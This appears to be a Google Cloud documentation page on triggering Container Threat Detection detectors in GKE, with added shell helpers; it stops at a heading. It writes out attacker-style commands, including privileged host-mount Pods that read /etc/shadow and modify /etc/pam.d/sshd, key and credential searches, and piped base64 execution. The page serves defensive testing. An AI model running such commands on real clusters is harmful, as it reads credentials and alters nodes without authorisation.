Testing Container Threat Detection

Premium and Enterprise service tiers

This page explains how to verify that Container Threat Detection is working by intentionally triggering detectors and checking for findings. Container Threat Detection is a built-in service of the Premium and Enterprise tiers of Security Command Center. To view Container Threat Detection findings, Container Threat Detection must be enabled in Security Command Center Services settings.

Before you begin

To detect potential threats to your containers, you need to make sure that your clusters are on a supported version of Google Kubernetes Engine (GKE). For more information, see Using a supported GKE version. If you want to test threat detection on ARM, you need a cluster with a node pool containing ARM instances. For more information, see Arm workloads on GKE.

Enable detectors

Some detectors are disabled by default. To test those detectors, you must first enable them. For a complete list of detectors that are disabled by default, see Disabled detectors.

  1. To check the status of all detectors, run the following command:

    export PROJECT=PROJECT_ID
    gcloud alpha scc settings services describe \
      --service=CONTAINER_THREAT_DETECTION \
      --project=${PROJECT}

  2. To enable a detector, run the following command:

    gcloud alpha scc settings services modules enable \
      --service=CONTAINER_THREAT_DETECTION \
      --module=MODULE_NAME \
      --project=${PROJECT}

    Replace MODULE_NAME with the module name of the detector that you want to enable. For a complete list of detectors and their corresponding module names, see Container Threat Detection detectors.

    For example, to enable the Added Binary Executed detector, run the following command:

    gcloud alpha scc settings services modules enable \
      --service=CONTAINER_THREAT_DETECTION \
      --module=ADDED_BINARY_EXECUTED \
      --project=${PROJECT}

Set environment variables

To test detectors, use the Google Cloud console and Cloud Shell. You can set environment variables in Cloud Shell to make it easier to run commands. The following variables are used to test all Container Threat Detection detectors.

  1. Go to the Google Cloud console.

  2. Select the project that contains the container you want to use to test.

  3. Click Activate Cloud Shell.

  4. In Cloud Shell, set environment variables.

    1. The zone your cluster is in:

      export ZONE=CLUSTER_ZONE

    2. The project your container is in:

      export PROJECT=PROJECT_ID

    3. Your cluster name:

      export CLUSTER_NAME=CLUSTER_NAME

The variables are set. The following sections include instructions for testingContainer Threat Detection detectors.

Added Binary Executed

To trigger an Added Binary Executed finding, drop a binary in your container and execute it. This example deploys the latest Ubuntu 24.04 image, copies /bin/ls to another location, and then executes the copy. The execution is unexpected because the copy, although byte-for-byte identical to a file shipped in the image, was not part of the original container image at that path, and containers are meant to be immutable.

  1. Set environment variables.

  2. In Cloud Shell, fetch credentials for the cluster so that kubectl can reach its control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
      --zone $ZONE \
      --project $PROJECT

  3. Drop a binary and execute it:

    • x86 node:

      tag="ktd-test-binary-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        "$tag" -- sh -c "cp /bin/ls /tmp/$tag; /tmp/$tag"

    • ARM node:

      tag="ktd-test-binary-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
          {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
          "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
          "value": "arm64" } ]}}' \
        "$tag" -- sh -c "cp /bin/ls /tmp/$tag; /tmp/$tag"

This test procedure creates an Added Binary Executed finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

For noise reduction, when you first create a container, Container Threat Detection temporarily filters Added Binary Executed findings. To see all Added Binary Executed findings while a container is being set up, prefix your container name or Pod name with ktd-test, as in the example.
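Every test on this page ends with "view the finding in Security Command Center" but gives no command for doing so. The following shell helpers are an added example, not part of the page or of the Container Threat Detection product: they build a findings query for one detector category, restricted to findings newer than a timestamp taken just before the test Pod was launched, and then keep only findings that mention the test Pod name, so that an old finding from an earlier run is not mistaken for a new one. ORG_ID, the SCC filter field names (category, state, event_time), the Cloud Logging log name threatdetection.googleapis.com/detection and the sample finding JSON are assumptions made here; check them against your own gcloud output before relying on them.

```shell
#!/bin/sh
# Added example (not from the page): confirm that a test produced a finding.
# Assumes ORG_ID (numeric organization ID) and PROJECT are exported, that the
# caller may list findings at the organization, and, for the Logging path,
# that Logging for Container Threat Detection is configured. Filter field
# names and the log name are assumptions to verify against your gcloud version.

# RFC 3339 timestamp; capture it just before launching a test so the query
# ignores findings from earlier runs.
ktd_now() { date -u +%Y-%m-%dT%H:%M:%SZ; }

# Findings filter for one detector category (the finding name as written on
# this page, for example "Added Binary Executed") newer than $2.
ktd_scc_filter() {
  printf 'category="%s" AND state="ACTIVE" AND event_time>="%s"' "$1" "$2"
}

# Cloud Logging filter for the detection log. %%2F is a literal %2F in the
# log name (printf would otherwise read %2F as a format directive).
ktd_log_filter() {
  printf 'logName="projects/%s/logs/threatdetection.googleapis.com%%2Fdetection"' "$PROJECT"
}

# Succeeds when the JSON on stdin mentions the test Pod name, i.e. the finding
# belongs to this run and not to some other ktd-test Pod.
ktd_mentions_tag() { grep -q -- "$1"; }

# Query SCC for category $1 since $3 and keep only findings that name Pod $2.
ktd_scc_check() {
  gcloud scc findings list "$ORG_ID" \
    --filter="$(ktd_scc_filter "$1" "$3")" --format=json | ktd_mentions_tag "$2"
}

# Same check through Cloud Logging, looking back one hour for Pod $1.
ktd_log_check() {
  gcloud logging read "$(ktd_log_filter)" --project="$PROJECT" \
    --freshness=1h --format=json | ktd_mentions_tag "$1"
}

# Constructed sample of roughly what one finding entry looks like; used only
# to exercise ktd_mentions_tag offline. Real output carries many more fields.
KTD_SAMPLE='{"finding":{"category":"Added Binary Executed","kubernetes":{"pods":[{"name":"ktd-test-binary-2024-01-01-00-00-00-utc"}]}}}'

# Usage during a test run:
#   since=$(ktd_now)
#   tag=...; kubectl run ... "$tag" ...        (one of the commands on this page)
#   ktd_scc_check "Added Binary Executed" "$tag" "$since" && echo "finding present"
```

Findings are not instantaneous; if the check fails right after the Pod exits, wait a minute or two and rerun it with the same since value rather than taking a new timestamp.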

Added Library Loaded

To trigger an Added Library Loaded finding, drop a library in your container and then load it. This example deploys the latest Ubuntu 24.04 image, copies /lib/x86_64-linux-gnu/libc.so.6 (on ARM, /lib/aarch64-linux-gnu/libc.so.6) to another location, and then loads the copy with the dynamic loader, ld. The loaded library is unexpected because the copy, although identical to a file shipped in the image, was not part of the original container image at that path, and containers are meant to be immutable.

  1. Set environment variables.

  2. In Cloud Shell, fetch credentials for the cluster so that kubectl can reach its control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
      --zone $ZONE \
      --project $PROJECT

  3. Drop a library and use ld to load it:

    • x86 node:

      tag="ktd-test-library-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        "$tag" -- sh -c \
        "cp /lib/x86_64-linux-gnu/libc.so.6 /tmp/$tag; /lib64/ld-linux-x86-64.so.2 /tmp/$tag"

    • ARM node:

      tag="ktd-test-library-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
          {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
          "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
          "value": "arm64" } ]}}' \
        "$tag" -- sh -c \
        "cp /lib/aarch64-linux-gnu/libc.so.6 /tmp/$tag; /lib/ld-linux-aarch64.so.1 /tmp/$tag"

This test procedure creates an Added Library Loaded finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center at the organization level.

For noise reduction, when you first create a container, Container Threat Detection temporarily filters Added Library Loaded findings. To see all Added Library Loaded findings while a container is being set up, prefix your container name or Pod name with ktd-test, as in the example.

Collection: Pam.d Modification (Preview)

To trigger a pam.d modification finding, modify one of the host's PAM-related files. This example deploys the latest Ubuntu 24.04 image, mounts the host's root filesystem into the container, and then modifies /etc/pam.d/sshd.

Because the Pod runs privileged and mounts the node's root filesystem, this test changes the node itself (it appends an empty line to the node's /etc/pam.d/sshd) and cannot run where privileged Pods are not allowed. Run it only on a disposable test cluster.

This is a file monitoring detector and has specific GKE version requirements.

  1. Set environment variables.

  2. In Cloud Shell, fetch credentials for the cluster so that kubectl can reach its control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
      --zone $ZONE \
      --project $PROJECT

  3. Execute a binary that modifies one of the PAM-related files on the host.

    • x86 node:

      tag="ktd-test-pamd-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never --rm=true -ti --image ubuntu "$tag" \
        --overrides='{"apiVersion": "v1", "spec": {
          "containers":[{"command": ["sh", "-c", "/bin/echo >> /host/etc/pam.d/sshd"],
          "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",
          "securityContext": {"privileged": true},
          "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",
          "readOnly": false}]}],
          "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}]}}'

    • ARM node:

      tag="ktd-test-pamd-arm-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never --rm=true -ti --image ubuntu "$tag" \
        --overrides='{"apiVersion": "v1", "spec": {
          "containers":[{"command": ["sh", "-c", "/bin/echo >> /host/etc/pam.d/sshd"],
          "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",
          "securityContext": {"privileged": true},
          "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",
          "readOnly": false}]}],
          "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}],
          "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[{ "effect":
          "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
          "value": "arm64" }] }}'

This test procedure triggers a pam.d modification finding that you can view in Security Command Center and, if you have configured Logging for Container Threat Detection, in Cloud Logging. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center at the organization level.
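Every test on this page is one of two kubectl run shapes: an unprivileged Pod that drops and executes something (Added Binary Executed, Added Library Loaded and the later command-line detectors), or a privileged Pod with the node's root filesystem mounted at /host (pam.d Modification and the other file-monitoring detectors), each with an optional arm64 nodeSelector and toleration. The helper below is an added example, not code from the page or from Google: it packages both shapes behind one function so that a test run is a single line, keeps the ktd-test Pod-name prefix that bypasses the start-up noise filter, and has a dry-run mode that prints the command instead of running it. The function names, the KTD_DRY_RUN variable and the use of sh -c for every test are choices made here; the image, override JSON and flags are the ones the page uses.

```shell
#!/bin/sh
# Added helper (not from the page): one function for the kubectl run pattern
# repeated in every test above. Assumes ZONE, PROJECT and CLUSTER_NAME are
# exported and that get-credentials has already been run. KTD_DRY_RUN=1
# prints the kubectl command line (one argument per line) instead of running it.

KTD_IMAGE="marketplace.gcr.io/google/ubuntu2404:latest"

# Pod name with the ktd-test prefix that bypasses the start-up noise filter
# and a UTC timestamp so that every run is unique.
ktd_tag() { printf 'ktd-test-%s-%s' "$1" "$(date -u +%Y-%m-%d-%H-%M-%S-utc)"; }

# nodeSelector/toleration fragment that pins the Pod to arm64 nodes;
# prints nothing for any other architecture.
ktd_arch_spec() {
  [ "$1" = "arm64" ] || return 0
  printf '"nodeSelector":{"kubernetes.io/arch":"arm64"},"tolerations":[{"effect":"NoSchedule","key":"kubernetes.io/arch","operator":"Equal","value":"arm64"}]'
}

# --overrides for an ordinary test Pod; empty unless arm64 scheduling is needed.
ktd_plain_overrides() {
  extra=$(ktd_arch_spec "$1")
  if [ -n "$extra" ]; then printf '{"apiVersion":"v1","spec":{%s}}' "$extra"; fi
}

# --overrides for the file-monitoring tests: a privileged container with the
# node root filesystem at /host, running $2 via sh -c. $2 is pasted into a
# JSON string as-is, so keep it free of double quotes and backslashes.
ktd_host_overrides() {
  tag=$1; cmd=$2; extra=$(ktd_arch_spec "$3")
  printf '{"apiVersion":"v1","spec":{%s"containers":[{"name":"%s","image":"%s","command":["sh","-c","%s"],"securityContext":{"privileged":true},"volumeMounts":[{"mountPath":"/host/","name":"host-mount","readOnly":false}]}],"volumes":[{"name":"host-mount","hostPath":{"path":"/"}}]}}' \
    "${extra:+$extra,}" "$tag" "$KTD_IMAGE" "$cmd"
}

# ktd_run NAME ARCH MODE COMMAND
#   MODE=exec  drop-and-execute style tests (Added Binary Executed, ...)
#   MODE=host  node-modifying tests (pam.d, /etc/shadow, journald.conf, ...)
ktd_run() {
  name=$1; arch=$2; mode=$3; cmd=$4
  tag=$(ktd_tag "$name")
  set -- kubectl run --restart=Never --rm=true -i --image "$KTD_IMAGE"
  if [ "$mode" = "host" ]; then
    set -- "$@" --overrides "$(ktd_host_overrides "$tag" "$cmd" "$arch")" "$tag"
  else
    ov=$(ktd_plain_overrides "$arch")
    if [ -n "$ov" ]; then set -- "$@" --overrides "$ov"; fi
    set -- "$@" "$tag" -- sh -c "$cmd"
  fi
  if [ "${KTD_DRY_RUN:-0}" = "1" ]; then printf '%s\n' "$@"; else "$@"; fi
}

# Examples (executed for real when KTD_DRY_RUN is unset):
#   ktd_run binary amd64 exec 'cp /bin/ls /tmp/x; /tmp/x'
#   ktd_run pamd   arm64 host '/bin/echo >> /host/etc/pam.d/sshd'
```

Run a test first with KTD_DRY_RUN=1 and read the printed override JSON; the host mode in particular creates a privileged Pod that can rewrite any file on the node, so it belongs on a disposable cluster only.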

Command and Control: Piped Encoded Code Execution

To trigger a Command and Control: Piped Encoded Code Execution finding, the output of a base64 decode command must be piped into a binary capable of code execution, such as python. This example uses the latest Ubuntu 24.04 image. It copies /bin/echo to /tmp/python, so that no real interpreter is needed, then uses echo and base64 -d to pipe the decoded string print('Hello World') into that python executable. This behavior is flagged as suspicious because it can indicate an attempt by an attacker to run an obfuscated script.

  1. Set environment variables.

  2. In Cloud Shell, fetch credentials for the cluster so that kubectl can reach its control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
      --zone $ZONE \
      --project $PROJECT

  3. Decode and pipe a base64-encoded string into python:

    • x86 node:

      tag="ktd-test-piped-exec-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        "$tag" -- bash -c \
        "cp /bin/echo /tmp/python; echo \"cHJpbnQoJ0hlbGxvIFdvcmxkJyk=\" | base64 -d | /tmp/python; sleep 10"

    • ARM node:

      tag="ktd-test-piped-exec-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
          {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
          "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
          "value": "arm64" } ]}}' \
        "$tag" -- bash -c \
        "cp /bin/echo /tmp/python; echo \"cHJpbnQoJ0hlbGxvIFdvcmxkJyk=\" | base64 -d | /tmp/python; sleep 10"

This test procedure creates a Command and Control: Piped Encoded Code Execution finding that you can view in Security Command Center and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Command and Control: Piped Encoded Download

To trigger a Command and Control: Piped Encoded Download finding, the output of an executable such as curl must be piped into a base64 decode command. This example uses the latest Ubuntu 24.04 image. It copies /bin/echo, renames the copy to curl, and then pipes the output of a simulated curl call into base64 -d. This behavior is flagged as suspicious because it can indicate an attempt to download and decode a malicious script for later use by an attacker.

  1. Set environment variables.

  2. In Cloud Shell, fetch credentials for the cluster so that kubectl can reach its control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
      --zone $ZONE \
      --project $PROJECT

  3. Execute a curl call and pipe its output into base64 -d:

    • x86 node:

      tag="ktd-test-piped-dl-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        "$tag" -- bash -c \
        "cp /bin/echo /tmp/curl; /tmp/curl \"cHJpbnQoJ0hlbGxvIFdvcmxkJyk=\" | base64 -d; sleep 10"

    • ARM node:

      tag="ktd-test-piped-dl-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
          {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
          "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
          "value": "arm64" } ]}}' \
        "$tag" -- bash -c \
        "cp /bin/echo /tmp/curl; /tmp/curl \"cHJpbnQoJ0hlbGxvIFdvcmxkJyk=\" | base64 -d; sleep 10"

This test procedure creates a Command and Control: Piped Encoded Download finding that you can view in Security Command Center and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Command and Control: Steganography Tool Detected

To trigger a Command and Control: Steganography Tool Detected (Preview) finding, a binary that looks like a steganography tool must execute within a container. This example uses the latest Ubuntu 24.04 image. It copies /bin/ls, renames the copy to steghide (another steganography tool name such as stegano would also work), and executes it. This behavior is flagged as suspicious because it can indicate an attempt to prepare a container for hiding or extracting data, potentially for malicious purposes.

  1. Set environment variables.

  2. In Cloud Shell, fetch credentials for the cluster so that kubectl can reach its control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
      --zone $ZONE \
      --project $PROJECT

  3. Execute a steganography tool binary like steghide:

    • x86 node:

      tag="ktd-test-steganography-tool-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        "$tag" -- bash -c \
        "cp /bin/ls /tmp/steghide; /tmp/steghide"

    • ARM node:

      tag="ktd-test-steganography-tool-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
          {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
          "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
          "value": "arm64" } ]}}' \
        "$tag" -- bash -c \
        "cp /bin/ls /tmp/steghide; /tmp/steghide"

This test procedure creates a Command and Control: Steganography Tool Detected finding that you can view in Security Command Center and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Credential Access: Access Sensitive Files on Nodes (Preview)

To trigger a Sensitive File Accessed finding, read the host's /etc/shadow file. This example deploys the latest Ubuntu 24.04 image, mounts the host's root filesystem into the container, and then reads /etc/shadow using cat.

This is a file monitoring detector and has specific GKE version requirements.

  1. Set environment variables.

  2. In Cloud Shell, fetch credentials for the cluster so that kubectl can reach its control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
      --zone $ZONE \
      --project $PROJECT

  3. Execute a binary that reads the host's /etc/shadow file.

    • x86 node:

      tag="ktd-test-sfa-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never --rm=true -ti --image ubuntu "$tag" \
        --overrides='{"apiVersion": "v1", "spec": {
          "containers":[{"command": ["/bin/cat", "/host/etc/shadow"],
          "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",
          "securityContext": {"privileged": true},
          "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",
          "readOnly": false}]}],
          "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}]}}'

    • ARM node:

      tag="ktd-test-sfa-arm-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never --rm=true -ti --image ubuntu "$tag" \
        --overrides='{"apiVersion": "v1", "spec": {
          "containers":[{"command": ["/bin/cat", "/host/etc/shadow"],
          "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",
          "securityContext": {"privileged": true},
          "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",
          "readOnly": false}]}],
          "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}],
          "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[{ "effect":
          "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
          "value": "arm64" }] }}'

This test procedure triggers a Sensitive File Accessed finding that you can view in Security Command Center and, if you have configured Logging for Container Threat Detection, in Cloud Logging. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center at the organization level.

Credential Access: Find Google Cloud Credentials

To trigger a Credential Access: Find Google Cloud Credentials finding, a binary capable of searching file contents needs to be executed within a container. This example uses the latest Ubuntu 24.04 image. It copies /bin/ls and renames the copy to grep. The renamed binary is then executed with an argument that specifies a search pattern indicative of Google Cloud credentials (GOOGLE_APPLICATION_CREDENTIALS). This action is flagged as suspicious because it mimics the behavior observed when attempting to locate Google Cloud credentials.

  1. Set environment variables.

  2. In Cloud Shell, fetch credentials for the cluster so that kubectl can reach its control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
      --zone $ZONE \
      --project $PROJECT

  3. Execute a search tool binary like grep with appropriate arguments:

    • x86 node:

      tag="ktd-test-find-gcp-credentials-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        "$tag" -- bash -c \
        "cp /bin/ls /tmp/grep; /tmp/grep GOOGLE_APPLICATION_CREDENTIALS"

    • ARM node:

      tag="ktd-test-find-gcp-credentials-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
          {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
          "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
          "value": "arm64" } ]}}' \
        "$tag" -- bash -c \
        "cp /bin/ls /tmp/grep; /tmp/grep GOOGLE_APPLICATION_CREDENTIALS"

This test procedure creates a Credential Access: Find Google Cloud Credentials finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Credential Access: GPG Key Reconnaissance

To trigger a Credential Access: GPG Key Reconnaissance finding, a binary capable of searching file contents needs to be executed within a container. This example uses the latest Ubuntu 24.04 image. It copies /bin/ls and renames the copy to find (another search utility name such as grep would also work). The renamed binary is then executed with an argument that names a GPG keyring file (secring.gpg). This action is flagged as suspicious because it mimics the behavior observed when attempting to locate GPG private keys.

  1. Set environment variables.

  2. In Cloud Shell, fetch credentials for the cluster so that kubectl can reach its control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
      --zone $ZONE \
      --project $PROJECT

  3. Execute a search tool binary like find with appropriate arguments:

    • x86 node:

      tag="ktd-test-gpg-key-reconnaissance-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        "$tag" -- bash -c \
        "cp /bin/ls /tmp/find; /tmp/find secring.gpg"

    • ARM node:

      tag="ktd-test-gpg-key-reconnaissance-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
          {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
          "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
          "value": "arm64" } ]}}' \
        "$tag" -- bash -c \
        "cp /bin/ls /tmp/find; /tmp/find secring.gpg"

This test procedure creates a Credential Access: GPG Key Reconnaissance finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Credential Access: Search Private Keys or Passwords

To trigger a Credential Access: Search Private Keys or Passwords finding, a binary capable of searching file contents needs to be executed within a container. This example uses the latest Ubuntu 24.04 image. It copies /bin/ls and renames the copy to find (another search utility name such as grep would also work). The renamed binary is then executed with an argument that specifies a search pattern indicative of private keys or passwords (id_rsa). This action is flagged as suspicious because it mimics the behavior observed when attempting to locate sensitive information like private keys or passwords within a containerized environment.

  1. Set environment variables.

  2. In Cloud Shell, fetch credentials for the cluster so that kubectl can reach its control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
      --zone $ZONE \
      --project $PROJECT

  3. Execute a search tool binary like find with appropriate arguments:

    • x86 node:

      tag="ktd-test-search-private-keys-or-pw-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        "$tag" -- bash -c \
        "cp /bin/ls /tmp/find; /tmp/find id_rsa"

    • ARM node:

      tag="ktd-test-search-private-keys-or-pw-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
          {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
          "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
          "value": "arm64" } ]}}' \
        "$tag" -- bash -c \
        "cp /bin/ls /tmp/find; /tmp/find id_rsa"

This test procedure creates a Credential Access: Search Private Keys or Passwords finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Defense Evasion: Base64 ELF File Command Lines

To trigger a Defense Evasion: Base64 ELF File Command Line finding, a process must have base64 as an argument and f0VMRgIB as an argument. f0VMRgIB is the base64 encoding of the ELF file header magic: the bytes \x7fELF followed by the class and data-encoding bytes of a 64-bit little-endian binary. This example uses the latest Ubuntu 24.04 image. base64 is executed with the -d and f0VMRgIB arguments. This action is flagged as suspicious because it mimics the behavior observed when an attacker decodes an embedded binary in order to execute malicious code.

  1. Set environment variables.

  2. In Cloud Shell, fetch credentials for the cluster so that kubectl can reach its control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
      --zone $ZONE \
      --project $PROJECT

  3. Run base64 -d with f0VMRgIB as an argument:

    • x86 node:

      tag="ktd-test-base64-elf-file-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        "$tag" -- bash -c \
        "base64 -d f0VMRgIB"

    • ARM node:

      tag="ktd-test-base64-elf-file-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
          {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
          "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
          "value": "arm64" } ]}}' \
        "$tag" -- bash -c \
        "base64 -d f0VMRgIB"

This test procedure creates two Defense Evasion: Base64 ELF File Command Line findings that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center. Two findings are created because the initial bash -c command line as well as the execution of the base64 -d command satisfy the finding criteria.

Defense Evasion: Base64 Encoded Python Script Executed

To trigger a Defense Evasion: Base64 Encoded Python Script Executed finding, a process must have echo or base64 as an argument and aW1wb3J0IH as an argument. aW1wb3J0IH is the base64 encoding of the string import followed by a space, the typical start of a Python script. This example uses the latest Ubuntu 24.04 image. echo is executed with the aW1wb3J0IH argument. This action is flagged as suspicious because it mimics the behavior observed when an attacker decodes an encoded script in order to execute malicious code.

  1. Set environment variables.

  2. In Cloud Shell, fetch credentials for the cluster so that kubectl can reach its control plane:

    gcloud container clusters get-credentials $CLUSTER_NAME \
      --zone $ZONE \
      --project $PROJECT

  3. Run echo with aW1wb3J0IH as an argument:

    • x86 node:

      tag="ktd-test-base64-elf-file-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        "$tag" -- bash -c \
        "echo aW1wb3J0IH"

    • ARM node:

      tag="ktd-test-base64-elf-file-$(date -u +%Y-%m-%d-%H-%M-%S-utc)"
      kubectl run \
        --restart=Never \
        --rm=true -i \
        --image marketplace.gcr.io/google/ubuntu2404:latest \
        --overrides='{"apiVersion": "v1", "spec": { "nodeSelector":
          {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":
          "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",
          "value": "arm64" } ]}}' \
        "$tag" -- bash -c \
        "echo aW1wb3J0IH"

This test procedure creates a Defense Evasion: Base64 Encoded Python Script Executed finding that you can view in Security Command Center, and in Cloud Logging if you've configured Logging for Container Threat Detection. Viewing findings in Cloud Logging is only available if you activate the Premium or Enterprise tier of Security Command Center.

Defense Evasion: Base64 Encoded Shell Script Executed

